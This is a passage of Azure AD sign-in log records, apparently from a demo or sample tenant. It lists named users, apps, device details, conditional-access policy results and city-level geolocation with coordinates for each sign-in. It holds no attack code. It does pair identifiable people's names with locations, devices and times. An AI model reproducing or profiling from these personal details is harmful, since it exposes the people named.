{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",0aa4716b-db4f-4af3-adf5-86eac5281a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,0aa4716b-db4f-4af3-adf5-86eac5281a00,SigninLogs,Sucess,33.7984581,-84.38828278
+488,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:53.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:03,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",a6587ce8-3be2-4519-a1d8-68efe4e60000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,a6587ce8-3be2-4519-a1d8-68efe4e60000,SigninLogs,Sucess,32.32146072,34.85319901
+489,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:40.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,33256600-1f55-4ce9-b867-f0bcd5e29ca3,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8361f2d3-1959-4242-988e-de2dd04e1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8361f2d3-1959-4242-988e-de2dd04e1b00,SigninLogs,Sucess,50.6406517,5.572050095
+490,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:50.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f6b579d6-573b-4b6f-a072-c97e3d051500,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f6b579d6-573b-4b6f-a072-c97e3d051500,SigninLogs,Sucess,51.4458313,-0.969720006
+491,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,19851ed5-dfd6-480d-b2bf-3e25cff3d50e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",99101c3d-fa2a-42b6-a9d2-fbb930fa1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,99101c3d-fa2a-42b6-a9d2-fbb930fa1a00,SigninLogs,Sucess,50.6406517,5.572050095
+492,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:03.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6537d34-e284-46ae-bb9c-278dfb6f426d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e164f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,62115b57-0cb2-458e-8ba0-179e164f1800,SigninLogs,Sucess,33.7984581,-84.38828278
+493,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fd694de-5895-4514-9729-2a675a82f669,Microsoft.aadiam,Microsoft.aadiam,,Anthony Roman,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:11,"{'operatingSystem': 'Windows 10', 'deviceId': '0b9d11a7-b5c6-48c5-898e-b62fde94f3b0', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-II6P5U4', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",638d0e13-8d1d-4e17-a207-4d2d54940200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -75.16385650634764, 'latitude': 39.94686126708984}, 'state': 'Pennsylvania', 'city': 'Philadelphia'}",none,none,none,none,[],{'errorCode': 0},Anthony Roman,2b2e5983-18b7-4b63-b87e-34de934cc906,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,638d0e13-8d1d-4e17-a207-4d2d54940200,SigninLogs,Sucess,39.94686127,-75.16385651
+494,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:26.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,28118dbd-6829-4bba-802c-bdb4be93417f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",581df607-a3b5-4d26-ad1e-df5222e51c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': 